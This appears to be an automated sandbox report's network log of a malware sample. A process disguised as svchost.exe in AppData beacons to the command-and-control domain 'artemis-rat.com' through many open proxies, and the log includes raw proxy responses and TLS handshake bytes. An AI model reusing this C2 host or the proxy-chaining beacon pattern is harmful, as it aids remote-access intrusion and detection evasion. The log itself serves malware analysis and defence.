                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2343192.168.2.557352185.158.114.142569743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.847419977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2344192.168.2.55743145.138.87.238108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.863157988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2345192.168.2.55657351.15.252.2461637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.863753080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.657879114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2346192.168.2.55738294.20.183.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.875725985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.250473976 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2347192.168.2.557638104.21.102.958043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.876518011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.030936003 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2348192.168.2.55651037.187.77.581341243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.877517939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974210978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.177565098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2349192.168.2.55744545.120.178.197108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.877688885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2350192.168.2.55748743.163.192.31567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.883649111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2351192.168.2.556972184.170.249.65414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.885783911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2352192.168.2.557419187.40.1.12312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.886563063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.234312057 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:31.197314978 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2353192.168.2.557653104.21.6.888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.892227888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.046390057 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2354192.168.2.55752535.72.118.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.893320084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.160758972 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:30.197535038 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a4 0f bd 1a 28 76 be 12 75 f3 2a be a9 83 3c 91 32 03 7e e3 3f 48 c1 4a 76 03 6e 0d 4b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR(vu*<2~?HJvnK*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:30.483139038 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 4c fb c9 57 60 6d 73 2f e6 58 d5 bb de e9 df 63 d1 f3 71 7a 47 4e f7 09 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9LW`ms/XcqzGNDOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa
                                                                                    Mar 9, 2024 13:14:30.532196045 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 d7 0a 5b 4b 6a 6d 93 d7 7e ea cf 7c 6c dd af b2 59 c6 3e 52 37 dd a8 69 6b 84 d8 af 1a b6 80 20 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 48 d9 27 67 d0 62 61 5c 14 46 97 92 82 7e ac 34 ce 94 9b a1 36
                                                                                    Data Ascii: %! [Kjm~|lY>R7ik (H'gba\F~46?$
                                                                                    Mar 9, 2024 13:14:30.815906048 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b7 16 22 a8 59 db ed 83 0a d9 5d 06 c4 f4 83 2b 1b a5 8f 79 80 1e 98 fb 9f cc 83 c6 a3 dc ce ea b1 58 57 f9 12 0d 81 0b
                                                                                    Data Ascii: ("Y]+yXW


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2355192.168.2.557413212.108.155.205909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.903359890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2356192.168.2.55736343.231.22.2298043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.903487921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.320318937 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2357192.168.2.55640137.18.73.60556643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.907334089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.264393091 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2358192.168.2.55751182.113.157.1223128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.912766933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2359192.168.2.557685104.16.213.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.913341999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.073498964 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2360192.168.2.557686172.67.181.518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.914108038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.068386078 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2361192.168.2.557482212.79.107.116567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.914396048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2362192.168.2.557498154.12.178.1072998543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.918920040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2363192.168.2.55750447.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.919013977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2364192.168.2.557705162.159.247.578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.931221962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.092458963 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
